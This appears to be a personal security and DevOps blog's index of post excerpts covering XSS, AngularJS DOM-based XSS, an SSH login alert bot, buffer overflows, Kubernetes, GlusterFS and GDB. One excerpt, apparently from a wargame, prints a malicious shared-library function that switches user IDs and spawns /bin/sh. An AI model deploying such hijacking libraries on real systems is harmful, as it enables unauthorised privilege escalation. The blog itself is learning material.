Blueprismo

Waste no more time arguing about what a good man should be. Be one

Work

Some things I’ve done. More to come :)

Angular XSS DOM BASED

Introduction Tonight I’m doing another challenge for XSS vulnerabilities, especially with AngularJS, which is a really common framework for developing web apps. As you may know, “Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities”. This time I had some fun with this new challenge, which consisted of finding an XSS DOM-based vulnerability with “Angular Expressions”. First things first! The way Angular binds data into the HTML is via expressions, and AngularJS expressions are written in double braces {{}}

XSS DOM BASED

Introduction DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, which typically allows them to hijack other users' accounts. What is the DOM? The Document Object Model (DOM) is a convention used to represent and work with objects in an HTML document (as well as in other document types).

SSH Guard

SSH Guard Today we are going to create an SSH guard, which is very useful if you have a personal server. Have you ever felt paranoid about your password / RSA key being compromised by a third party? Worry no more! With a Discord bot and some PAM configuration tweaks you can feel more relaxed. Side note: I’ve used Discord, but you can use any app that you want as long as it supports webhooks (for example Telegram)

XSS Vulnerabilities

Introduction Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Stack-Based Buffer Overflow

Introduction Stack-Based Buffer Overflow exploits are likely the shiniest and most common form of exploit for remotely taking over the code execution of a process. These exploits were extremely common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-based overflow attacks by operating system developers, application developers, and hardware manufacturers, with changes even being made to the standard libraries developers use. 📝 Understanding this kind of exploit involves at least a basic understanding of computer memory.

Kubernetes

Brief introduction I once heard Kubernetes is like teenage sex: everybody talks about it, you think people around you do it a lot, but nobody really knows how it is properly done. So at my job I was asked if I would join to discover a way to deploy something with this new technology: Kubernetes. Kubernetes (or k8s for short) is an open-source platform that allows you to manage/orchestrate containers in a versatile way, with functions like auto-scaling, rollback when an automated-deploy is not mounted, etc.

Continuous integration

Continuous Integration Yeah, we hear a lot about DevOps, automation, etc. It’s indeed cool to worry as little as possible about the deployment of an architecture. So let’s tinker and put together a little project with a few components using Docker. The architecture we’re going to have is something like this: Let me describe its components:

* NGINX: Acts as a front-end reverse proxy; it will forward all the external requests to our internal application (database or django+gunicorn).

Setuid, getuid...

Fibonacci series teardown

    #include <stdio.h>
    #include <stdlib.h>     /* system() */
    #include <unistd.h>
    #include <sys/types.h>

    void better_printf(){
        printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid());
        setreuid(1001,1001);
        setgid(1001);
        printf("I'm the bad library\n");
        printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid());
        system("/bin/sh");
    }

#level2

    level2@sojack:/tmp/evil$ cat test2.c
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>

    void better_printf(){
        printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid());
        setreuid(1003,1003);
        setgid(1003);
        printf("I'm the bad library\n");
        printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid());
        system("/bin/sh");
    }

Setting up a 3-node cluster with GlusterFS

Beginning with GlusterFS GlusterFS is a scalable network filesystem suitable for data-intensive tasks such as cloud storage and media streaming. A big problem we find, for example, in a Docker swarm is that data between its nodes is not replicated. But we can use NFS for sharing storage! - I said to my IT partner, Edu. The problem with NFS is that if the NFS share is unavailable the whole cluster can’t reach that data.

Playing with Gnu Debugger

Fibonacci series teardown First, we have a little recursive function: the famous Fibonacci series. As we may know, the Fibonacci sequence has a couple of initial conditions, the numbers 0 and 1, and for any number other than these two the function is calculated with the formula fib(n-1) + fib(n-2). Here’s the brief C code:

    #include <stdio.h>

    int fib(int n) {
        if (n == 0)
            return 0;
        else if (n == 1)
            return 1;
        else
            return fib(n-1) + fib(n-2);
    }

    int main (int argc, char *argv[]){
        int n = 5;
        printf("Calculating fibonacci of number %d\n",n);
        printf("%d\n", fib(n));
        return 0;
    }

For the moment, quite easy to understand.